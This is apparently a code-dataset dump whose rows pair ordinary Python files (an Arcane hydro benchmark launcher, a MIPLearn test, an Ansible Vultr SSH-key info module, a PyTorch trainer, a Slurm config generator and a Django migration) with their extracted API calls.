code
stringlengths 22
1.05M
| apis
listlengths 1
3.31k
| extract_api
stringlengths 75
3.25M
|
|---|---|---|
#!/usr/bin/env python3
# Note: il faut au moins python 3.5 (pour subprocess.run())
import argparse
import subprocess
from string import Template
from argparse import RawDescriptionHelpFormatter
# XML template for the generated Arcane case file (test.arc).
# The $-placeholders (nb_part_*, nb_cell_*, do_load_balance) are filled in
# below via string.Template.substitute().
xstr = """<?xml version="1.0"?>
<case codename="ArcaneTest" xml:lang="en" codeversion="1.0">
<arcane>
<title>Tube a choc de Sod</title>
<timeloop>ArcaneHydroLoop</timeloop>
<modules>
<module name="ArcaneLoadBalance" active="$do_load_balance" />
</modules>
</arcane>
<meshes>
<mesh>
<ghost-layer-builder-version>4</ghost-layer-builder-version>
<generator name="Cartesian3D" >
<nb-part-x>$nb_part_x</nb-part-x>
<nb-part-y>$nb_part_y</nb-part-y>
<nb-part-z>$nb_part_z</nb-part-z>
<origin>1.0 2.0 3.0</origin>
<generate-sod-groups>true</generate-sod-groups>
<x><n>$nb_cell_x</n><length>2.0</length></x>
<y><n>$nb_cell_y</n><length>2.0</length></y>
<z><n>$nb_cell_z</n><length>4.0</length></z>
</generator>
<initialization>
<variable><name>Density</name><value>1.0</value><group>ZG</group></variable>
<variable><name>Density</name><value>0.125</value><group>ZD</group></variable>
<variable><name>Pressure</name><value>1.0</value><group>ZG</group></variable>
<variable><name>Pressure</name><value>0.1</value><group>ZD</group></variable>
<variable><name>AdiabaticCst</name><value>1.4</value><group>ZG</group></variable>
<variable><name>AdiabaticCst</name><value>1.4</value><group>ZD</group></variable>
</initialization>
</mesh>
</meshes>
<arcane-checkpoint>
<do-dump-at-end>false</do-dump-at-end>
</arcane-checkpoint>
<arcane-load-balance>
<active>true</active>
<partitioner name="Metis" />
<period>5</period>
<statistics>true</statistics>
<max-imbalance>0.01</max-imbalance>
<min-cpu-time>0</min-cpu-time>
</arcane-load-balance>
<!-- Configuration du module hydrodynamique -->
<simple-hydro>
<deltat-init>0.00001</deltat-init>
<deltat-min>0.000001</deltat-min>
<deltat-max>0.0001</deltat-max>
<final-time>0.2</final-time>
<viscosity>cell</viscosity>
<viscosity-linear-coef>.5</viscosity-linear-coef>
<viscosity-quadratic-coef>.6</viscosity-quadratic-coef>
<boundary-condition>
<surface>XMIN</surface><type>Vx</type><value>0.</value>
</boundary-condition>
<boundary-condition>
<surface>XMAX</surface><type>Vx</type><value>0.</value>
</boundary-condition>
<boundary-condition>
<surface>YMIN</surface><type>Vy</type><value>0.</value>
</boundary-condition>
<boundary-condition>
<surface>YMAX</surface><type>Vy</type><value>0.</value>
</boundary-condition>
<boundary-condition>
<surface>ZMIN</surface><type>Vz</type><value>0.</value>
</boundary-condition>
<boundary-condition>
<surface>ZMAX</surface><type>Vz</type><value>0.</value>
</boundary-condition>
</simple-hydro>
</case>
"""
# Extended (French) help text shown verbatim in the argparse epilog; it is a
# user-facing runtime string, so it is left untranslated here.
epilog_doc = """
Ce script permet de spécifier et d'exécuter le test MicroHydro en MPI
sur N processeurs, chaque processeur ayant le même nombre de mailles.
Il permet donc des tests d'extensibilité faible (weak scaling).
Ce test doit s'exécuter dans le répertoire où Arcane a été compilé.
L'option '-n|--nb-proc' spécifie le nombre de processus. Si ce nombre
est supérieur à 32, il doit être un multiple de 32.
L'option '-s|--mesh-size' indique le nombre de chunks de mailles pour
chaque PE. La taille d'un chunk est de 2000 mailles. Par defaut le
nombre de chunk est de 10.
Il est possible de spécifier un repartitionnement via l'option
'-l|--loadbalance'. Dans ce cas, le repartitionnement aura lieu toutes
les 5 itérations. Arcane doit avec été compilé avec 'ParMetis' pour
que cela fonctionne.
"""
# ---------------------------------------------------------------------------
# Command line parsing.
# ---------------------------------------------------------------------------
parser = argparse.ArgumentParser(description="MicroHydro bench", formatter_class=RawDescriptionHelpFormatter, epilog=epilog_doc)
required_arguments = parser.add_argument_group('required named arguments')
required_arguments.add_argument("-n", "--nb-proc", dest="nb_proc", action="store", help="number of processus", type=int, required=True)
parser.add_argument("-s", "--mesh-size", dest="mesh_size", action="store", help="size of mesh", type=int, default=10)
parser.add_argument("-l", "--load-balance", dest="do_load_balance", action="store_true", help="true if load balance is activated")
parser.add_argument("-m", "--max-iteration", dest="max_iteration", action="store", help="number of iteration to do", type=int, default=100)
parser.add_argument("-p", "--arcane-driver-path", dest="arcane_driver_path", action="store", help="arcane_test_driver path", type=str, default="./bin/arcane_test_driver")
args = parser.parse_args()

nb_proc = args.nb_proc
nb_cell_mult = args.mesh_size
# Above 32 PEs the 8x4xN decomposition below requires a multiple of 32.
if nb_proc > 32 and nb_proc % 32 != 0:
    raise RuntimeError("Bad number of proc (should be a multiple of 32)")

s = Template(xstr)
# Number of parts in (X,Y,Z). X*Y*Z must equal the number of PEs.
nb_part_x = 8
nb_part_y = 4
nb_part_z = nb_proc // 32
# Below 32 PEs, use a specific hand-picked decomposition.
_SMALL_DECOMPOSITIONS = {
    24: (4, 3, 2),
    16: (4, 2, 2),
    12: (3, 2, 2),
    8: (2, 2, 2),
    4: (2, 2, 1),
}
if nb_proc in _SMALL_DECOMPOSITIONS:
    nb_part_x, nb_part_y, nb_part_z = _SMALL_DECOMPOSITIONS[nb_proc]
elif nb_part_z == 0:
    # Fewer than 32 PEs with no special case: one part per PE along X.
    nb_part_x, nb_part_y, nb_part_z = nb_proc, 1, 1
total_nb_part = nb_part_x * nb_part_y * nb_part_z

# Number of cells in (X,Y,Z); Z scales with the per-PE mesh-size factor so
# each PE keeps the same number of cells (weak scaling).
nb_cell_x = 20 * nb_part_x
nb_cell_y = 20 * nb_part_y
nb_cell_z = 5 * nb_part_z * nb_cell_mult
total_nb_cell = nb_cell_x * nb_cell_y * nb_cell_z

do_load_balance = "true" if args.do_load_balance else "false"
d = {
    "nb_part_x": nb_part_x, "nb_part_y": nb_part_y, "nb_part_z": nb_part_z,
    "nb_cell_x": nb_cell_x, "nb_cell_y": nb_cell_y, "nb_cell_z": nb_cell_z,
    "do_load_balance": do_load_balance
}
z = s.substitute(d)
print(z)
print("TotalNbCell=", total_nb_cell, " (per part=", total_nb_cell // total_nb_part, ")")

# Write the generated case file; 'with' guarantees the file is closed even
# if the write raises (the original left the handle to be GC'd on error).
with open("test.arc", mode="w") as case_file:
    case_file.write(z)

# Launch the Arcane test driver on the generated case.
command = [args.arcane_driver_path, "launch", "-n", str(nb_proc), "-m", str(args.max_iteration), "-We,ARCANE_NEW_MESHINIT,1", "test.arc"]
print(command)
subprocess.run(command)
|
[
"subprocess.run",
"argparse.ArgumentParser",
"string.Template"
] |
[((3830, 3954), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""MicroHydro bench"""', 'formatter_class': 'RawDescriptionHelpFormatter', 'epilog': 'epilog_doc'}), "(description='MicroHydro bench', formatter_class=\n RawDescriptionHelpFormatter, epilog=epilog_doc)\n", (3853, 3954), False, 'import argparse\n'), ((4919, 4933), 'string.Template', 'Template', (['xstr'], {}), '(xstr)\n', (4927, 4933), False, 'from string import Template\n'), ((6349, 6372), 'subprocess.run', 'subprocess.run', (['command'], {}), '(command)\n', (6363, 6372), False, 'import subprocess\n')]
|
# MIPLearn: Extensible Framework for Learning-Enhanced Mixed-Integer Optimization
# Copyright (C) 2020-2021, UChicago Argonne, LLC. All rights reserved.
# Released under the modified BSD license. See COPYING.md for more details.
import os.path
from scipy.stats import randint
from miplearn.benchmark import BenchmarkRunner
from miplearn.problems.stab import MaxWeightStableSetGenerator
from miplearn.solvers.learning import LearningSolver
def test_benchmark() -> None:
    """End-to-end smoke test of BenchmarkRunner with 1 and 4 workers."""
    for n_jobs in [1, 4]:
        # Small train/test instance sets drawn from the same generator.
        gen = MaxWeightStableSetGenerator(n=randint(low=25, high=26))
        train_instances = gen.generate(5)
        test_instances = gen.generate(3)

        # Fit a solver on the training instances.
        training_solver = LearningSolver()
        training_solver.parallel_solve(train_instances, n_jobs=n_jobs)  # type: ignore

        # Benchmark two fresh solver strategies on the held-out instances.
        benchmark = BenchmarkRunner(
            {
                "Strategy A": LearningSolver(),
                "Strategy B": LearningSolver(),
            }
        )
        benchmark.fit(train_instances, n_jobs=n_jobs)  # type: ignore
        benchmark.parallel_solve(
            test_instances,  # type: ignore
            n_jobs=n_jobs,
            n_trials=2,
        )

        # 3 instances x 2 solvers x 2 trials = 12 result rows, 21 columns.
        benchmark.write_csv("/tmp/benchmark.csv")
        assert os.path.isfile("/tmp/benchmark.csv")
        assert benchmark.results.values.shape == (12, 21)
|
[
"miplearn.benchmark.BenchmarkRunner",
"scipy.stats.randint",
"miplearn.solvers.learning.LearningSolver"
] |
[((783, 799), 'miplearn.solvers.learning.LearningSolver', 'LearningSolver', ([], {}), '()\n', (797, 799), False, 'from miplearn.solvers.learning import LearningSolver\n'), ((1051, 1080), 'miplearn.benchmark.BenchmarkRunner', 'BenchmarkRunner', (['test_solvers'], {}), '(test_solvers)\n', (1066, 1080), False, 'from miplearn.benchmark import BenchmarkRunner\n'), ((959, 975), 'miplearn.solvers.learning.LearningSolver', 'LearningSolver', ([], {}), '()\n', (973, 975), False, 'from miplearn.solvers.learning import LearningSolver\n'), ((1003, 1019), 'miplearn.solvers.learning.LearningSolver', 'LearningSolver', ([], {}), '()\n', (1017, 1019), False, 'from miplearn.solvers.learning import LearningSolver\n'), ((600, 624), 'scipy.stats.randint', 'randint', ([], {'low': '(25)', 'high': '(26)'}), '(low=25, high=26)\n', (607, 624), False, 'from scipy.stats import randint\n')]
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2018, <NAME> <<EMAIL>>
# (c) 2019, <NAME> <<EMAIL>>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
# Standard Ansible module metadata: maturity ('preview') and support channel.
ANSIBLE_METADATA = {'metadata_version': '1.1',
                    'status': ['preview'],
                    'supported_by': 'community'}

# Documentation blocks parsed by ansible-doc as YAML.
# NOTE(review): the YAML indentation inside these raw strings looks
# flattened (likely by whatever extracted this file) -- verify against the
# upstream vultr_ssh_key_info module, since Ansible parses these as YAML.
DOCUMENTATION = r'''
---
module: vultr_ssh_key_info
short_description: Get information about the Vultr SSH keys available.
description:
- Get infos about SSH keys available.
version_added: "2.9"
author:
- "<NAME> (@Spredzy)"
- "<NAME> (@resmo)"
extends_documentation_fragment: vultr
'''
EXAMPLES = r'''
- name: Get Vultr SSH keys infos
vultr_ssh_key_info:
register: result
- name: Print the infos
debug:
var: result.vultr_ssh_key_info
'''
RETURN = r'''
---
vultr_api:
description: Response from Vultr API with a few additions/modification
returned: success
type: complex
contains:
api_account:
description: Account used in the ini file to select the key
returned: success
type: str
sample: default
api_timeout:
description: Timeout used for the API requests
returned: success
type: int
sample: 60
api_retries:
description: Amount of max retries for the API requests
returned: success
type: int
sample: 5
api_retry_max_delay:
description: Exponential backoff delay in seconds between retries up to this max delay value.
returned: success
type: int
sample: 12
version_added: '2.9'
api_endpoint:
description: Endpoint used for the API requests
returned: success
type: str
sample: "https://api.vultr.com"
vultr_ssh_key_info:
description: Response from Vultr API as list
returned: success
type: complex
contains:
id:
description: ID of the ssh key
returned: success
type: str
sample: 5904bc6ed9234
name:
description: Name of the ssh key
returned: success
type: str
sample: my ssh key
date_created:
description: Date the ssh key was created
returned: success
type: str
sample: "2017-08-26 12:47:48"
ssh_key:
description: SSH public key
returned: success
type: str
sample: "ssh-rsa AA... <EMAIL>"
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.vultr import (
Vultr,
vultr_argument_spec,
)
class AnsibleVultrSSHKeyInfo(Vultr):
    """Thin wrapper around the Vultr API for listing account SSH keys."""

    def __init__(self, module):
        super(AnsibleVultrSSHKeyInfo, self).__init__(module, "vultr_ssh_key_info")
        # Map the raw Vultr API field names onto the names this module
        # returns; 'SSHKEYID' is renamed to the friendlier 'id'.
        self.returns = {
            'SSHKEYID': {'key': 'id'},
            'name': {},
            'ssh_key': {},
            'date_created': {},
        }

    def get_sshkeys(self):
        """Return the raw /v1/sshkey/list response from the Vultr API."""
        return self.api_query(path="/v1/sshkey/list")
def parse_keys_list(keys_list):
    """Flatten the API's ``{ssh_key_id: key_data}`` mapping into a list.

    Parameters
    ----------
    keys_list : dict or None
        Mapping returned by the Vultr /v1/sshkey/list endpoint; may be
        None or empty when the account has no keys.

    Returns
    -------
    list
        The key-data values, or ``[]`` when there are none.
    """
    if not keys_list:
        return []
    # Original comprehension shadowed the builtin `id`; values() is the
    # idiomatic (and identical-order) equivalent.
    return list(keys_list.values())
def main():
    """Module entry point: query all SSH keys and exit with the result."""
    module = AnsibleModule(
        argument_spec=vultr_argument_spec(),
        supports_check_mode=True,
    )
    sshkey_info = AnsibleVultrSSHKeyInfo(module)
    keys = parse_keys_list(sshkey_info.get_sshkeys())
    module.exit_json(**sshkey_info.get_result(keys))


if __name__ == '__main__':
    main()
|
[
"ansible.module_utils.vultr.vultr_argument_spec",
"ansible.module_utils.basic.AnsibleModule"
] |
[((3113, 3134), 'ansible.module_utils.vultr.vultr_argument_spec', 'vultr_argument_spec', ([], {}), '()\n', (3132, 3134), False, 'from ansible.module_utils.vultr import Vultr, vultr_argument_spec\n'), ((3149, 3217), 'ansible.module_utils.basic.AnsibleModule', 'AnsibleModule', ([], {'argument_spec': 'argument_spec', 'supports_check_mode': '(True)'}), '(argument_spec=argument_spec, supports_check_mode=True)\n', (3162, 3217), False, 'from ansible.module_utils.basic import AnsibleModule\n')]
|
import os
import torch
from tqdm import tqdm
from .base import BaseAgent
from util.mylogger import get_writer
class Trainer(BaseAgent):
    """Training agent: builds model and data from config and runs the loop.

    When ``args.load`` is set, dataset/loader state and model weights are
    restored from that checkpoint; otherwise fresh data is generated.
    """

    def __init__(self, config, args):
        super().__init__(config, args)
        if args.load != '':
            # Resume: reload data pipeline and model weights from checkpoint.
            self.ckpt_dir_flag, self.train_set, self.dev_set, self.train_loader, self.dev_loader = \
                self.load_data(ckpt_path=args.load,
                               dataset_config=config.dataset,
                               dataloader_config=config.dataloader,
                               njobs=args.njobs)
            self.model_state, self.step_fn = self.build_model(config.build)
            self.model_state = self.load_model(self.model_state, args.load)
        else:
            # Fresh run: generate data and start from a new model.
            self.ckpt_dir_flag, self.train_set, self.dev_set, self.train_loader, self.dev_loader = \
                self.gen_data(ckpt_path=config.ckpt_dir, flag=config.flag,
                              dataset_config=config.dataset,
                              dataloader_config=config.dataloader,
                              njobs=args.njobs)
            self.model_state, self.step_fn = self.build_model(config.build)
        # use customed logger, e.g. wandb or tensorboard
        self.writer = get_writer(config, args, self.ckpt_dir_flag)

    def build_model(self, build_config):
        """Build the model in train mode on this agent's device."""
        return super().build_model(build_config, mode='train', device=self.device)

    def _prepare_mel_data(self, mels):
        """Normalize mel tensors and pair each with its rendered waveform.

        Mels whose second dimension is not 80 are interpolated to 80 bins.
        Returns ``{name: (normalized_mel_numpy, waveform)}`` for logging.
        """
        # assumes each mel is (batch, bins, frames) before the transpose
        # -- TODO confirm against the dataset pipeline.
        prepared = {}
        for name, mel in mels.items():
            if mel.shape[1] != 80:
                mel = torch.nn.functional.interpolate(mel.transpose(1, 2), 80).transpose(1, 2)
            prepared[name] = (mel.cpu().numpy() / 5 + 1, self.mel2wav(mel))
        return prepared

    # ====================================================
    #                       train
    # ====================================================
    def train(self, total_steps, verbose_steps, log_steps, save_steps, eval_steps):
        """Optimize until ``total_steps``, periodically logging, saving and evaluating.

        Parameters
        ----------
        total_steps : int
            Stop once the global step counter exceeds this.
        verbose_steps, log_steps, save_steps, eval_steps : int
            Periods (in steps) for progress-bar updates, mel logging,
            checkpointing and dev-set evaluation respectively.
        """
        while self.model_state['steps'] <= total_steps:
            train_bar = tqdm(self.train_loader)
            for data in train_bar:
                self.model_state['steps'] += 1
                meta = self.step_fn(self.model_state, data)
                if self.model_state['steps'] % log_steps == 0:
                    if self.writer is None:
                        print('* self.writer is not implemented.')
                    else:
                        # self.writer.log(meta['log'], step=self.model_state['steps'])
                        _data = self._prepare_mel_data(meta['mels'])
                        # self.writer.mels_summary(
                        #     tag='train/seen',
                        #     data=_data,
                        #     sample_rate=22050,
                        #     step=self.model_state['steps']
                        # )
                if self.model_state['steps'] % verbose_steps == 0:
                    meta['log']['steps'] = self.model_state['steps']
                    train_bar.set_postfix(meta['log'])
                if self.model_state['steps'] % save_steps == 0:
                    self.save_model(self.model_state,
                                    os.path.join(self.ckpt_dir_flag, f'steps_{self.model_state["steps"]}.pth'))
                if self.model_state['steps'] % eval_steps == 0 and self.model_state['steps'] != 0:
                    self.evaluate()

    # ====================================================
    #                      evaluate
    # ====================================================
    def evaluate(self):
        """Run one validation step on the next dev batch and log mel summaries."""
        try:
            data = next(self.dev_iter)
        except (AttributeError, StopIteration):
            # First call (dev_iter not created yet) or exhausted iterator:
            # (re)start it.  The original bare `except:` also swallowed
            # unrelated errors such as KeyboardInterrupt.
            self.dev_iter = iter(self.dev_loader)
            data = next(self.dev_iter)
        with torch.no_grad():
            meta = self.step_fn(self.model_state, data, train=False)
            _data = self._prepare_mel_data(meta['mels'])
            self.writer.mels_summary(
                tag='dev/unseen',
                data=_data,
                sample_rate=22050,
                step=self.model_state['steps']
            )
|
[
"tqdm.tqdm",
"util.mylogger.get_writer",
"torch.no_grad",
"os.path.join"
] |
[((1193, 1237), 'util.mylogger.get_writer', 'get_writer', (['config', 'args', 'self.ckpt_dir_flag'], {}), '(config, args, self.ckpt_dir_flag)\n', (1203, 1237), False, 'from util.mylogger import get_writer\n'), ((1659, 1682), 'tqdm.tqdm', 'tqdm', (['self.train_loader'], {}), '(self.train_loader)\n', (1663, 1682), False, 'from tqdm import tqdm\n'), ((3656, 3671), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (3669, 3671), False, 'import torch\n'), ((3115, 3189), 'os.path.join', 'os.path.join', (['self.ckpt_dir_flag', 'f"""steps_{self.model_state[\'steps\']}.pth"""'], {}), '(self.ckpt_dir_flag, f"steps_{self.model_state[\'steps\']}.pth")\n', (3127, 3189), False, 'import os\n')]
|
#! /opt/cloud_sdk/bin/python
import re
from typing import Dict, Optional
import yaml
import citc.utils
def load_yaml(filename) -> dict:
    """Parse the YAML file at *filename* and return its contents."""
    with open(filename, "r") as stream:
        return yaml.safe_load(stream)
def get_limits() -> Dict[str, Dict[str, str]]:
    """Load the per-shape service limits from the local limits file.

    OCI does not yet expose an API to fetch service limits, so they are
    hard-coded in "limits.yaml".
    """
    return load_yaml("limits.yaml")
def get_shapes() -> Dict[str, Dict[str, str]]:
    """Return node shape info, preferring the provider API over a local file."""
    try:
        return citc.utils.get_types_info()
    except NotImplementedError:
        # Provider has no types API: fall back to the static config file.
        return load_yaml("/etc/citc/shapes.yaml")
def get_mgmt_info() -> Dict[str, str]:
    """Return the management node's shape info, or {} when not configured."""
    try:
        return load_yaml("/etc/citc/mgmt_shape.yaml")
    except FileNotFoundError:
        # No mgmt shape file on this system: nothing to reserve.
        return {}
def get_nodespace() -> Dict[str, Dict[str, str]]:
    """Load the cluster nodespace description (cluster id etc.)."""
    return load_yaml("/etc/citc/startnode.yaml")
def encode_nodename(shape_name: str, node_number: int, cluster_id: str, ad: Optional[int] = None) -> str:
    """Build a Slurm node name from shape, number, cluster id and optional AD.

    Dots in the shape name become dashes and the node number is zero-padded
    to at least four digits.  With an availability domain the name is
    ``<shape>-ad<ad>-<nnnn>``; otherwise ``<cluster_id>-<shape>-<nnnn>``.
    """
    shape_slug = shape_name.lower().replace(".", "-")
    number_part = "{:0>4}".format(node_number)
    if ad is None:
        return "-".join([cluster_id, shape_slug, number_part])
    return "-".join([shape_slug, "ad{}".format(ad), number_part])
def create_slurmconf_line(number: int, shape_info: Dict, shape: str, cluster_id, ad: Optional[int] = None):
    """Render one slurm.conf ``NodeName=...`` line for a cloud node.

    ``shape_info`` supplies hardware facts (cores, memory, gres, ...);
    missing optional fields fall back to sensible defaults.
    """
    nodename = encode_nodename(shape, number, cluster_id, ad)
    arch = shape_info.get("arch", "x86_64")
    pg = shape_info.get("cluster_group", False)
    features = f"shape={shape},ad={ad},arch={arch},pg={pg}"
    sockets = shape_info.get("sockets", 1)
    threads = shape_info.get("threads_per_core", 1)
    gres = shape_info.get("gres", "")
    # Field widths match the original template so columns stay aligned.
    return (
        f'NodeName={nodename:40} State={"CLOUD":7} '
        f'SocketsPerBoard={sockets:<1} '
        f'CoresPerSocket={shape_info["cores_per_socket"]:<3} '
        f'ThreadsPerCore={threads:<1} '
        f'RealMemory={shape_info["memory"]:<10} '
        f'Gres="{gres}" Features="{features}"'
    )
def get_node_configs(limits, shapes, mgmt_info, nodespace):
    """Yield one slurm.conf node line per node permitted by the limits.

    ``limits`` maps a shape name either to a flat count or to a
    per-availability-domain ``{ad: count}`` mapping.  One slot is
    subtracted when the management node occupies the same shape and AD.
    """
    for shape, shape_counts in limits.items():
        try:
            shape_info = shapes[shape]
        except KeyError as exc:
            # Unknown shape: report it and continue with the rest.
            print("Error: Could not find shape information for {}. \nPlease log a ticket at https://github.com/clusterinthecloud/terraform/issues/new".format(exc))
            continue
        if isinstance(shape_counts, int):
            # Flat count: number the nodes 1..count with no AD suffix.
            for number in range(1, shape_counts + 1):
                yield create_slurmconf_line(number, shape_info, shape, nodespace["cluster_id"])
        else:
            for ad, ad_count in shape_counts.items():
                if mgmt_info and shape == mgmt_info["mgmt_shape"] and ad == mgmt_info["mgmt_ad"]:
                    # The management node consumes one slot in this shape/AD.
                    ad_count -= 1
                for number in range(1, ad_count + 1):
                    yield create_slurmconf_line(number, shape_info, shape, nodespace["cluster_id"], ad)
# TODO Make sure that any nodes which are no longer managed due to service limit reductions are terminated.
slurm_conf_filename = "/mnt/shared/etc/slurm/slurm.conf"

node_config = "\n".join(get_node_configs(get_limits(), get_shapes(), get_mgmt_info(), get_nodespace()))

# Matches the generated block between the STARTNODES/ENDNODES markers.
chop = re.compile('(?<=# STARTNODES\n)(.*?)(?=\n?# ENDNODES)', re.DOTALL)
with open(slurm_conf_filename) as f:
    all_config = f.read()
# Use a callable replacement so that backslashes and group references
# (e.g. "\g") inside node_config are inserted literally; a plain string
# replacement would have re.sub interpret them as escapes.
new_config = chop.sub(lambda _match: node_config, all_config)
with open(slurm_conf_filename, "w") as f:
    f.write(new_config)
|
[
"yaml.safe_load",
"re.compile"
] |
[((3318, 3386), 're.compile', 're.compile', (['"""(?<=# STARTNODES\n)(.*?)(?=\n?# ENDNODES)"""', 're.DOTALL'], {}), '("""(?<=# STARTNODES\n)(.*?)(?=\n?# ENDNODES)""", re.DOTALL)\n', (3328, 3386), False, 'import re\n'), ((190, 207), 'yaml.safe_load', 'yaml.safe_load', (['f'], {}), '(f)\n', (204, 207), False, 'import yaml\n')]
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-06-17 21:02
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial migration: creates the Actor, Cast, Contact and Movie tables.

    Auto-generated by Django 1.9.7 -- edit with care.
    """

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Actor',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('first_name', models.CharField(max_length=100)),
                ('last_name', models.CharField(max_length=100)),
                ('image', models.ImageField(blank=True, null=True, upload_to='actor/')),
            ],
            options={
                'ordering': ['last_name', 'first_name'],
                'verbose_name': 'Actor',
                'verbose_name_plural': 'Actors',
            },
        ),
        migrations.CreateModel(
            name='Cast',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=250)),
                ('description', models.TextField(blank=True)),
                ('image', models.ImageField(blank=True, null=True, upload_to='casts/')),
                # Deleting an Actor cascades to its Cast rows.
                ('actor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='store.Actor')),
            ],
            options={
                'ordering': ['name'],
                'verbose_name': 'Cast',
                'verbose_name_plural': 'Casts',
            },
        ),
        migrations.CreateModel(
            name='Contact',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('phone', models.CharField(max_length=30)),
                ('email', models.EmailField(max_length=254)),
                ('address', models.TextField(blank=True)),
                # One contact record per actor, reachable as actor.contact_information.
                ('actor', models.OneToOneField(editable=False, on_delete=django.db.models.deletion.CASCADE, related_name='contact_information', to='store.Actor')),
            ],
        ),
        migrations.CreateModel(
            name='Movie',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=250)),
                ('year', models.PositiveIntegerField()),
                ('description', models.TextField()),
                ('image', models.ImageField(blank=True, null=True, upload_to='movies/')),
            ],
            options={
                'ordering': ['-year', 'name'],
                'verbose_name': 'Movie',
                'verbose_name_plural': 'Movies',
            },
        ),
        # Added after Movie exists to break the Cast<->Movie creation cycle.
        migrations.AddField(
            model_name='cast',
            name='movie',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='store.Movie'),
        ),
    ]
|
[
"django.db.models.TextField",
"django.db.models.OneToOneField",
"django.db.models.ForeignKey",
"django.db.models.CharField",
"django.db.models.PositiveIntegerField",
"django.db.models.AutoField",
"django.db.models.ImageField",
"django.db.models.EmailField"
] |
[((2948, 3033), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""store.Movie"""'}), "(on_delete=django.db.models.deletion.CASCADE, to='store.Movie'\n )\n", (2965, 3033), False, 'from django.db import migrations, models\n'), ((398, 491), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (414, 491), False, 'from django.db import migrations, models\n'), ((521, 553), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (537, 553), False, 'from django.db import migrations, models\n'), ((586, 618), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (602, 618), False, 'from django.db import migrations, models\n'), ((647, 707), 'django.db.models.ImageField', 'models.ImageField', ([], {'blank': '(True)', 'null': '(True)', 'upload_to': '"""actor/"""'}), "(blank=True, null=True, upload_to='actor/')\n", (664, 707), False, 'from django.db import migrations, models\n'), ((1021, 1114), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (1037, 1114), False, 'from django.db import migrations, models\n'), ((1138, 1170), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(250)'}), '(max_length=250)\n', (1154, 1170), False, 'from django.db import migrations, models\n'), ((1205, 1233), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)'}), '(blank=True)\n', (1221, 1233), False, 'from django.db import migrations, models\n'), ((1262, 1322), 'django.db.models.ImageField', 'models.ImageField', ([], 
{'blank': '(True)', 'null': '(True)', 'upload_to': '"""casts/"""'}), "(blank=True, null=True, upload_to='casts/')\n", (1279, 1322), False, 'from django.db import migrations, models\n'), ((1351, 1436), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""store.Actor"""'}), "(on_delete=django.db.models.deletion.CASCADE, to='store.Actor'\n )\n", (1368, 1436), False, 'from django.db import migrations, models\n'), ((1727, 1820), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (1743, 1820), False, 'from django.db import migrations, models\n'), ((1845, 1876), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(30)'}), '(max_length=30)\n', (1861, 1876), False, 'from django.db import migrations, models\n'), ((1905, 1938), 'django.db.models.EmailField', 'models.EmailField', ([], {'max_length': '(254)'}), '(max_length=254)\n', (1922, 1938), False, 'from django.db import migrations, models\n'), ((1969, 1997), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)'}), '(blank=True)\n', (1985, 1997), False, 'from django.db import migrations, models\n'), ((2026, 2166), 'django.db.models.OneToOneField', 'models.OneToOneField', ([], {'editable': '(False)', 'on_delete': 'django.db.models.deletion.CASCADE', 'related_name': '"""contact_information"""', 'to': '"""store.Actor"""'}), "(editable=False, on_delete=django.db.models.deletion.\n CASCADE, related_name='contact_information', to='store.Actor')\n", (2046, 2166), False, 'from django.db import migrations, models\n'), ((2292, 2385), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, 
